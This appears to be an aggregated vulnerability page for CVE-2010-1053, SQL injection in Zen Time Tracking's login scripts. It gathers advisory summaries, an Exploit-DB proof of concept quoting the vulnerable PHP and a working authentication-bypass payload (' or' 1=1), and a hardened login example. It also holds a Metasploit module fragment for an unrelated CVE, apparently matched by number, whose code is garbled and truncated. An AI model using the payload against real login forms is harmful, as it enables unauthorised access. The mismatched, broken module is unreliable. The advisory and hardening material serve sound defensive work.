CVE-2010-1053
Published 2010-03-23
CVE-2010-1053: Multiple SQL injection vulnerabilities in Zen Time Tracking 2.2 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL…
Priority P3 · 40 · medium · CVSS 2.0: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.91% (55.6th percentile)
Multiple SQL injection vulnerabilities in Zen Time Tracking 2.2 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters to (a) userlogin.php and (b) managerlogin.php. NOTE: some of these details are obtained from third party information.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zentracking | zen_time_tracking | <= 2.2 | — |
VulDB
Zentracking Zen Time Tracking up to 2.2 userlogin.php sql injection (EDB-11345 / XFDB-56146)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1053 [MEDIUM] Zentracking Zen Time Tracking up to 2.2 userlogin.php sql injection (EDB-11345 / XFDB-56146)
A vulnerability has been found in Zentracking Zen Time Tracking up to 2.2 and classified as critical. Affected is an unknown function of the file userlogin.php. Performing a manipulation results in sql injection.
This vulnerability was named CVE-2010-1053. The attack may be initiated remotely. In addition, an exploit is available.
It is suggested to enhance authentication.
GHSA
GHSA-fj99-v4gr-wrxc: Multiple SQL injection vulnerabilities in Zen Time Tracking 2
ghsa_unreviewed·2022-05-02
CVE-2010-1053 [MEDIUM] CWE-89 GHSA-fj99-v4gr-wrxc: Multiple SQL injection vulnerabilities in Zen Time Tracking 2
Multiple SQL injection vulnerabilities in Zen Time Tracking 2.2 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters to (a) userlogin.php and (b) managerlogin.php. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-1999-1053 The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
---
```ruby
##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Matt Wright guestbook.pl Arbitrary Command Execution',
'Description' => %q{
The Matt Wright guestbook.pl [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
[ 'CVE', '1999-1053' ],
[ 'OSVDB', '84' ],
[ 'BID', '776' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
```
Exploit-DB
Zen Tracking 2.2 - Authentication Bypass
exploitdb·2010-02-07
CVE-2010-1053 Zen Tracking 2.2 - Authentication Bypass
Zen Tracking 2.2 - Authentication Bypass
---
[+] Zen Tracking
[+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/
[+] Vuln Code :
[userlogin.php]
```php
// Excerpt from userlogin.php as quoted in the advisory: both POST values are
// concatenated straight into the query string, so with magic_quotes_gpc
// disabled nothing escapes the quote characters. (mysql_error() is also
// appended to the query text itself, a separate defect in the original.)
if (!empty($_POST['password']))
{
    $username = $_POST['username'];
    $password = $_POST['password'];
    dbConnect();
    $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'". mysql_error());
```
[+] PoC :
[ZenTracking_path]/userlogin.php
username: ' or' 1=1
Password: ' or' 1=1
[+] Vuln Code :
[managerlogin.php]
```php
// Excerpt from managerlogin.php as quoted in the advisory: the same pattern
// against the manager table, with the same unescaped concatenation.
if (!empty($_POST['password']))
{
    $username = $_POST['username'];
    $password = $_POST['password'];
    dbConnect();
    $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'". mysql_error());
```
[+] PoC :
[ZenT
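For contrast with the excerpts above, here is a hardened form of the same login check. It is an added example written for this page, not code from Zen Time Tracking: only the username reaches the query, bound as a parameter so it is matched literally rather than parsed as SQL, and the password is verified against a stored hash instead of being compared inside the statement. It assumes a mysqli connection in `$db`, the page's `$tbluser` table with `username` and `password` columns, and that stored passwords have been rehashed with `password_hash()`.

```php
<?php
// Added example: hardened replacement for the userlogin.php check quoted above.
// Assumes $db is a mysqli connection and $tbluser holds the user table name.
function authenticateUser(mysqli $db, string $tbluser, string $username, string $password): ?string
{
    // The table name is still interpolated, so restrict it to a safe identifier
    // instead of trusting a variable that a misconfiguration could overwrite.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $tbluser)) {
        throw new InvalidArgumentException('unexpected table name');
    }

    // Only the username is used to select the row, and it is bound as a
    // parameter: an input such as "' or' 1=1" is compared as a plain string.
    $stmt = $db->prepare("SELECT username, password FROM `{$tbluser}` WHERE username = ? LIMIT 1");
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Fail closed: no row, or a hash mismatch, both return null. The password
    // column is assumed to hold a password_hash() value, not plaintext.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    return $row['username'];
}

if (!empty($_POST['username']) && !empty($_POST['password'])) {
    $user = authenticateUser($db, $tbluser, $_POST['username'], $_POST['password']);
    if ($user === null) {
        http_response_code(401);
        exit('Invalid username or password');
    }
    session_start();
    session_regenerate_id(true);
    $_SESSION['username'] = $user;
}
```

The same change applies to managerlogin.php with `$tblmanager` in place of `$tbluser`.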
No writeups or analysis indexed.